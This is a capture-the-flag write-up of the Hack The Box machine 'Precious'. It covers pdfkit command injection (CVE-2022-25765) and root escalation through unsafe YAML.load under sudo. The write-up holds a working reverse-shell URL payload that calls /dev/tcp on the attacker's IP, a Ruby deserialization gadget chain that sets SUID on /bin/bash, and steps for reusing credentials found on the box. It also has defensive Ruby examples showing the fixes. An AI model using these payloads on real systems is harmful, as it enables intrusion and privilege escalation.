OSCP security study notes

Precious HTB Writeup

2023-03-04  doinb1517

Key points

1. RCE via command injection in pdfkit

2. Privilege escalation through unsafe YAML.load in a sudo-allowed Ruby script

Writeup

1. Visiting the IP redirects to the hostname precious.htb (add it to /etc/hosts).


An nmap scan shows only ports 22 (SSH) and 80 (HTTP) open.


First test the site's functionality: it converts a web page into a PDF. Trying baidu.com returns the error "Cannot load remote URL!", which suggests the server has no outbound Internet access, so the URL has to point at something it can reach, i.e. the attacking machine.


Start a simple HTTP server with python3 on the attacking machine:

python3 -m http.server 80

Submitting the attacker's URL (http://10.10.14.18) to the web page works: the result is a PDF rendering of the directory listing served by the Python server, and the file can be downloaded.


Parse the PDF's metadata with exiftool; the Creator/Producer fields identify the library that generated it (pdfkit) and its version:

exiftool 5013dj9nl5h13bd7lmv8gkqn5ndpe8zz.pdf

That version of pdfkit has a known command injection vulnerability (CVE-2022-25765): the URL is placed into the wkhtmltopdf shell command line, so backticks in it are executed by the shell. A ready-made PoC is at https://github.com/shamo0/PDFkit-CMD-Injection

Keep the web server running, open a second shell and listen on the reverse-shell port (9999 in the payload below), then submit this URL to the converter:

http://10.10.14.18?name=#{'%20`bash -c "sh -i >& /dev/tcp/10.10.14.18/9999 0>&1"`'}

The listener receives a reverse shell as the web application user (ruby).

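An added example (not the page's code and not pdfkit's source) that reconstructs the bug class behind the PoC above in Ruby. The renderer command line is built as one string and handed to IO.popen, so /bin/sh interprets the backticks inside the double-quoted URL; `echo` stands in for the wkhtmltopdf binary and the URL is constructed with a harmless command in place of the reverse shell. The two fixes shown (argv form, or Shellwords.escape) are what the patched pdfkit release amounts to in principle, and the final check is a defence-in-depth filter a converter like this one could apply. Two details of the PoC are worth knowing: the `#{'…'}` wrapper is a leftover from the upstream Ruby PoC, where it was string interpolation; sent over HTTP it is just literal characters and the shell only cares about the backticks. The `%20` is there because the affected pdfkit versions skip their own URI escaping when the URL already contains percent-escapes.

```ruby
require 'shellwords'

# Constructed attacker-controlled URL: same shape as the PoC above, but the
# backticks run a harmless echo instead of a reverse shell.
INJECTED_URL = 'http://10.10.14.18/?name=%20`echo INJECTED`'

# Vulnerable pattern (illustrative, not pdfkit's own code): the renderer
# command line is a single string, so IO.popen runs it via /bin/sh -c and the
# shell evaluates the backticks inside the double-quoted URL.
def render_vulnerable(url)
  IO.popen(%(echo "#{url}"), &:read).chomp
end

# Fix 1: argv form. No shell is spawned, so the URL reaches the renderer as
# one literal argument and the backticks are only characters.
def render_safe(url)
  IO.popen(['echo', url], &:read).chomp
end

# Fix 2: if a string command line is unavoidable, shell-escape the argument
# instead of relying on double quotes, which do not stop backtick expansion.
def render_escaped(url)
  IO.popen("echo #{Shellwords.escape(url)}", &:read).chomp
end

# Defence in depth at the web tier: a page-to-PDF converter has no reason to
# accept shell metacharacters in a URL, so reject them before rendering.
def suspicious_url?(url)
  !!(url =~ /[`$;|&<>\n]/)
end

if $PROGRAM_NAME == __FILE__
  puts "vulnerable: #{render_vulnerable(INJECTED_URL)}"
  puts "argv form:  #{render_safe(INJECTED_URL)}"
  puts "escaped:    #{render_escaped(INJECTED_URL)}"
  puts "flagged:    #{suspicious_url?(INJECTED_URL)}"
end
```

The vulnerable variant prints the URL with `INJECTED` substituted where the backticks were, i.e. the command ran; both fixed variants print the URL verbatim, backticks included.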

The config file under /home/ruby/.bundle (where Bundler stores credentials for private gem sources) contains a username and password, and they are valid for the user henry:

henry@precious:~$ cat /home/henry/user.txt 
fd652c1495464dcea3800fd4801ba740

Next, privilege escalation. Check what henry may run with sudo:

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:~$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

Ruby's YAML.load is unsafe here: with the Psych version this script runs on, it resolves `!ruby/object:` tags into instances of any loadable class, so a crafted document is an insecure-deserialization primitive that can be chained into `Kernel#system`. Two details make it exploitable as henry: the script runs as root under sudo, and `File.read("dependencies.yml")` is a relative path, so the file is read from whatever directory the sudo command is run from. (On Psych 4, bundled with Ruby 3.1 and later, YAML.load defaults to safe_load and this chain no longer works; the correct fix in any version is YAML.safe_load.)

参考:https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml
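An added example (not the page's code and not the target's script) showing the difference that decides this privilege escalation: `YAML.load` on older Psych instantiates whatever class a `!ruby/object:` tag names, while `YAML.safe_load` raises `Psych::DisallowedClass`. The class `DepsEntry`, the two YAML documents and the path `/opt/dependencies.yml` are constructed for the example; the real gadget chain instantiates Gem::Installer, Gem::RequestSet and Net::WriteAdapter instead of a harmless class. The loader picks `YAML.unsafe_load` when it exists so the same code demonstrates the behaviour on both Psych 3 and Psych 4.

```ruby
require 'yaml'

# Hypothetical class standing in for any class reachable on the load path.
class DepsEntry
  attr_accessor :name, :version
end

# Constructed: what dependencies.yml is meant to contain.
BENIGN_YAML = "---\nrake: '13.0.6'\nrails: '7.0.4'\n"

# Constructed: a tagged document of the kind YAML.load resolves. It builds a
# harmless DepsEntry instead of the Gem::Installer/Net::WriteAdapter chain.
TAGGED_YAML = "--- !ruby/object:DepsEntry\nname: rake\nversion: '13.0.6'\n"

# What /opt/update_dependencies.rb does. Psych 3 (Ruby <= 3.0): YAML.load
# honours !ruby/object tags. Psych 4 (Ruby >= 3.1): YAML.load became safe and
# the old behaviour moved to YAML.unsafe_load, so use whichever is present.
def load_trusting_tags(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# The fix: safe_load only builds strings, numbers, arrays and hashes, and
# raises Psych::DisallowedClass for any !ruby/object tag.
def load_rejecting_tags(text)
  YAML.safe_load(text)
end

# Result of running a document through the safe loader.
def classify(text)
  load_rejecting_tags(text)
  :accepted
rescue Psych::DisallowedClass
  :rejected
end

# Hardened replacement for list_from_file: safe loader plus an absolute path,
# so the caller's working directory no longer chooses which file is parsed.
# The location is assumed; the page never says where dependencies.yml lives.
DEPS_PATH = '/opt/dependencies.yml'
def list_from_file_hardened(path = DEPS_PATH)
  YAML.safe_load(File.read(path))
end

if $PROGRAM_NAME == __FILE__
  obj = load_trusting_tags(TAGGED_YAML)
  puts "YAML.load built a #{obj.class} named #{obj.name}"
  puts "safe_load on the same document: #{classify(TAGGED_YAML)}"
  puts "safe_load on a real dependency list: #{load_rejecting_tags(BENIGN_YAML)}"
end
```

Any class that the unsafe loader can name becomes an object with attacker-chosen instance variables; the gist referenced above just picks classes whose methods, called in the right order, end in `Kernel#system`.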

The generic payload from that gist is as follows. The chain ends in a Net::WriteAdapter whose socket is the Kernel module and whose method is :system, so the string in git_set is the command that runs; that is the only part to change.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id # replace with the command to run
         method_id: :resolve

Adapt it so the command sets the SUID bit on /bin/bash:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "chmod +s /bin/bash"
         method_id: :resolve

Save this as dependencies.yml in the current directory (the script reads it from the working directory the sudo command is run from, e.g. henry's home), then run the allowed command:

sudo /usr/bin/ruby /opt/update_dependencies.rb

/bin/bash is now SUID root. Start it with the -p flag so it keeps the effective uid instead of dropping it, and the root flag is readable:

b281e4eebb264c1f8dee8589d9365517